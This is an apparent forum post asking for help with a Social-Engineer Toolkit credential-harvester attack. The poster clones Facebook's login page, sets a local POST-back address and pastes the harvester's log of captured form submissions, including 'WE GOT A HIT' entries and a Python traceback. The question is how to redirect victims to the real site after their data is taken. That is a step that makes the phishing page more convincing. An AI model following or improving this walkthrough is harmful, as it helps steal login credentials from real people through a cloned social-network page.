hello nice to greet the community, I have problems trying to clone a website with setoolkit clones the website but I did not redirect to the original page, please help me
look this !
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
-------------------------------------------------------------------------------
--- * IMPORTANT * READ THIS BEFORE ENTERING IN THE IP ADDRESS * IMPORTANT * ---
The way that this works is by cloning a site and looking for form fields to
rewrite. If the POST fields are not usual methods for posting forms this
could fail. If it does, you can always save the HTML, rewrite the forms to
be standard forms and use the "IMPORT" feature. Additionally, really
important:
If you are using an EXTERNAL IP ADDRESS, you need to place the EXTERNAL
IP address below, not your NAT address. Additionally, if you don't know
basic networking concepts, and you have a private IP address, you will
need to do port forwarding to your NAT IP address from your external IP
address. A browser doesns't know how to communicate with a private IP
address, so if you don't specify an external IP address if you are using
this from an external perpective, it will not work. This isn't a SET issue
this is how networking works.
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.0.31]:
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com
[*] Cloning the website: https://login.facebook.com/login.php [*] This could take a little bit...
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [*] The Social-Engineer Toolkit Credential Harvester Attack[*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below:
192.168.0.29 - - [29/Apr/2020 12:36:03] "GET / HTTP/1.1" 200 -
192.168.0.29 - - [29/Apr/2020 12:36:05] "GET /intern/common/referer_frame.php HTTP/1.1" 404 -[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: ------WebKitFormBoundaryOBFuI9nz8pb1ROev
Content-Disposition: form-data; name="ts"
1588178169655
------WebKitFormBoundaryOBFuI9nz8pb1ROev
Content-Disposition: form-data; name="q"
[{"app_id":"256281040558","posts":"9x7waVtbImdrMl9l eHBvc3VyZSIseyJpZGVudGlmaWVyIjoiMTA3MzUwMCIsImhhc2 giOiJBVDVPTHU3ZDcyZWRMZjlvIn0sMTU4ODE3ODE2NTAwMi4z OCwwLDUwXSxbInJlcXVpcmVfY29uZF8RYxxfbG9nZ2luZ0JrAP BWQWEzWEFpNWVOdVlZdG5sQ2VzeWp5c1hROXVVY3phc0Fqc3Bn LTVYRFZoZ0ctN2xtUlV2OUVfZC1NN0pfdXNEUnZIcEhUNWZuaX Y1NzdMbTkyNzNYUWtBOqEAIDcuMSwwLDEwNNKhAPBcbWRGaV8x bEFwS1VqLUhsMlBsYVJQVzJ2XzVSdmhpdlRzczRvZV8wYjFNc0 RxZV9qbjJ0WEplNmN6c2Zwd2VEdVJIQ3NFV0U4aEdDWkpicTBP S01yczhSYURZVlJ6QqoACDQwNQGsBDEzAaxypwEUOTQ2ODk0Lq YBNDZMQko3enNWVS1sZkxBOlsACDguMgFaBDQ5glkAFDY3Njky MjJZADBBNlQ4a1VwMW1XZC0yQlkADDk0LDCiWQAAMC5ZADQ0bj YxeTJCLXVUVnQzQjZZABAxOC45Oa6zAAAxLloANDZpNi01WjRt bkVuOHFiNloAEDIyLjQ4ploACDgzNy5aADQ0Q2xCRGVNdFlVaU 9OWTpaAAg0LjmWDAEUMTExMzI0MlkANDZ5Y25CT3FjSnRHNE1f OlkADDcuMjcBs2lmRHNjcmlwdF9wYXRoX2NoYW5nZWFbFHNvdX JjZQUWGCI6bnVsbCwRExB0b2tlbhEUCGRlcwk7OCI6Ii9sb2dp bi5waHAiLAkZDSsYImFkOTc2NCWv8F5pbXByZXNzaW9uX2lkIj oiMEdOZlhOcEhjTFRHM1dnRTUiLCJjYXVzZSI6ImxvYWQiLCJz aWRfcmF3IjoiMG5heGxsOnNuaTB6ZjpsczVtc3MiLCJyZWZlcn JlciI6IhF6GGVmX3BhZ2UypwB0dXJpIjoiaHR0cHM6Ly93d3cu ZmFjZWJvb2suY29tHb4AfZ2TLDE4NS40OCwwLDI1NUHuBHJltp QE8GMxS0t6a19sVGlHSkdaR19NcXVmNl90czFHZjlpcVFDaU5F NDlFRk44R1pmVmM3eVpidGRhaG52cnNKTWl0cnNObkVMekRKRU U5X0pVX1hCa0tlcUhfWWRoX0paY3hFIn0sMTU4rT4Bqwg1NTV5 88KsAPBQSWNwS0VEb2drN1NVTkxrT0wxa0pHZ05sMTFTbHNmUE d2MGxxS005OVpWMDFvaW5LeDU1cFptWWY2RW5DNWhSeWF0ejFU b1B1MkxQRnYwVFFXQksBADVlLAgxMDEhTHKTBBQ3MDgyNTMuLQ M0N1JmaEJScGlpbGd0ajkyWwAUMzM5LjMskTnC+ADwUG5qOTFH VlJGUXlUSG9FNUJRNVhCT3FsTUpqRzBJeFU4ajlqUVZZaVBXRU NiM0ozaFo2NkdxRXFxUFctRHRJakZEZE1UalBUZ2hjd2FiakJv Ii6XAQWcZXAIMTAwAfe+nwDwRDBNMTI5cHcyVXNzR2prcUtUZU 96VDVJR2RBZkxvQUFuZldQLVJmaHNtNUFjdVVnbExiMWNsZGpM blh0Sk5mcGxIQjNzc0IvAckdBDg4AZJyiQEYMTM5OTIxOC6KAT Q1aGlSUHBBeUhra3VEdTZbABQ3Mi4xNizxw3JaABA3Mjk2MzLE BTQ1Qi1jZjlEYjJQQWFLekJZAAAynncGFDEzODE3NjK0ADQ2RH FKYTFmQ3o5RFpDR0ZbAAA2YTkANSWhhrUAMh8GNDdyUG1odTJa Rk8tNzIxQloAEDMwNSwwjtMGFDEyODE1MKEBAGgeLAk0NFJRM1 VJajhELTViNnNGWwCaaQEUMTI5MTAyMk0DMDZnOGFESG9ybDZB eEI2LgchwwAzZaiKDwEYMTI5NDE4Mi4eAjQ0T19ISDRfR1NYM0 NLWkK1AAA0DkEJjloAFDMzNDY2OS5aADQ1QnN1bllvOUNsOHBI dkZaAA48CI5aABA0MDEwNjZ5AjBicDRFMmRPZ0YwY0x0RloAnh 4CFDE0MDUxMTJqATQ0YVI3cnh3ZXlzakZJNEZbAKJqARQwOTk4 OTMuEAE0N0VSODk2OWpuaUdLSHIyWwAQNDEwLjUS8wgpEcJ1BP BKLUxPTTVlVjV5QmhlWTBXWENKellFZU1TdGhzUHhhNzNBQXF6 MURjSXNaSGZfYjJMbFRQWHBpNFdhSzVqV0ZMb3hLcGswTGJIMC 1nQpkAADZBuAA51lAH8FQtcVdoSDZXc0l6dDhjYUh6S2NiX3pj T3BaNXpTem1lWlhiOHN0SkhPMnN5T2h6c1djMlF3N2JZcTdCSV ZONThQLTRHRWdVZEttT0t6NlVYWmRPNWlURqIAJTsEMTAFpHIQ BBQ2Nzc3NjIulgE0NGQ0eGZWeUJHVzg1cHM2WwAMNDguMAH9AD QSOwtMd2ViX2RldmljZV9wZXJmX2luZm8O4AwOgQlYY3B1X2Nv cmVzIjoyLCJncHVfdmVuZG8O5QgsR29vZ2xlIEluYy4iCRsQcm VuZGUWAgngQU5HTEUgKEludGVsKFIpIEhEIEdyYXBoaWNzIDUx MCBEaXJlY3QzRDExIHZzXzVfMCBwc181XzApMqkAEDU3MC4wpW 4IMTE3hiMGFDQyNzMwOC4FATQ3QVl3ZTFGZzZoMFdPRC5cABA3 ODI2LpkEIGNsaWNrX3JlZgH5LGdlciIsWyIyMkU1IiaFCSA5Nj M2LCJhY3Q2FAAYNCwxLCJwYRIDCgVGBCIsFQgALQ4XCjAiLCIv Iix7ImZ0Ijp7CRsoX3R5cGUiOiJsZWZh5gQiZwEbRH19LDcyNi wzMTUsMCwwLCJscxpZCggvbG8e0goAXTaPAAQuMAHCADFpXDhj YXRlZ29yaXplZF9vZHMBcwwyOTY2AXVMbXMudGltZV9zcGVudC 5xYS53d3cBGB0VOGJpdHMuanNfaW5pdGlhbAFGGCI6WzFdfX0q Rgg4OTY1MC4yMzUsMCw3Ml1d","user":"0","webSessionId ":"0naxll:sni0zf:ls5mss","trigger":"categorized_od s","send_method":"ajax","compression":"snappy_base 64","snappy_ms":4},{"webSessionId":"0naxll:sni0zf: ls5mss","posts":[["categorized_ods",{"2979":{"banzai":{"blue_message s_received":[35]}}},1588178169650.95,0,51]],"user":"0","app_id":"256281040558","compression": ""},{"webSessionId":"0naxll:sni0zf:ls5mss","posts" :[["categorized_ods",{"2979":{"banzai":{"blue_message s_sent":[35]}}},1588178169651.1,0,47]],"user":"0","app_id":"256281040558","compression": ""}]
------WebKitFormBoundaryOBFuI9nz8pb1ROev--
----------------------------------------
Exception happened during processing of request from ('192.168.0.29', 53011)
Traceback (most recent call last):
File "/usr/lib/python3.8/socketserver.py", line 650, in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python3.8/socketserver.py", line 360, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python3.8/socketserver.py", line 720, in __init__
self.handle()
File "/usr/lib/python3.8/http/server.py", line 427, in handle
self.handle_one_request()
File "/usr/lib/python3.8/http/server.py", line 415, in handle_one_request
method()
File "/usr/share/set/src/webattack/harvester/harvester.py", line 334, in do_POST
filewrite.write(cgi.escape("PARAM: " + line + "\n"))
AttributeError: module 'cgi' has no attribute 'escape'
----------------------------------------
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: ------WebKitFormBoundaryFhGCfd5ONNGACxag
Content-Disposition: form-data; name="ts"
1588178170483
------WebKitFormBoundaryFhGCfd5ONNGACxag
Content-Disposition: form-data; name="q"
[{"app_id":"256281040558","posts":"4gO4W1siY2xpY2tf cmVmX2xvZ2dlciIsWyIyMkU1IiwxNTg4MTc4MTY5NjM2LCJhY3 Q2FAAoNCwxLCJwYXNzIiwJRh0IRC0iLCJyIiwiLyIseyJmdCI6 ewkjQF90eXBlIjoibGVmdCJ9LCJnARtMfX0sNzI2LDMxNSwwLD AsImxzNW0FViwvbG9naW4ucGhwIl02jwBgLjAxLDEsMTUwXSxb ImdrMl9leHBvc3VyZQFw0GlkZW50aWZpZXIiOiIxMjc4NjM5Ii wiaGFzaCI6IkFUNGpqWDF6Q1hTbzZkYTUifSwxNTg4DeogNTEu MzMsMCw1BVoAY4IdARQ3MDQ1OSw2HQEJFCQyLCJlbWFpbCIsCU cdCMIeARwzMCwyNzEsMIYeAQV8KC41NywwLDE1MV1d","user" :"0","webSessionId":"0naxll:sni0zf:ls5mss","trigge r":"click_ref_logger","send_method":"ajax","compre ssion":"snappy_base64","snappy_ms":1},{"webSession Id":"0naxll:sni0zf:ls5mss","posts":[["categorized_ods",{"2979":{"banzai":{"blue_message s_received":[4]}}},1588178170482.04,0,50]],"user":"0","app_id":"256281040558","compression": ""},{"webSessionId":"0naxll:sni0zf:ls5mss","posts" :[["categorized_ods",{"2979":{"banzai":{"blue_message s_sent":[5]}}},1588178170482.12,0,46]],"user":"0","app_id":"256281040558","compression": ""}]
------WebKitFormBoundaryFhGCfd5ONNGACxag--
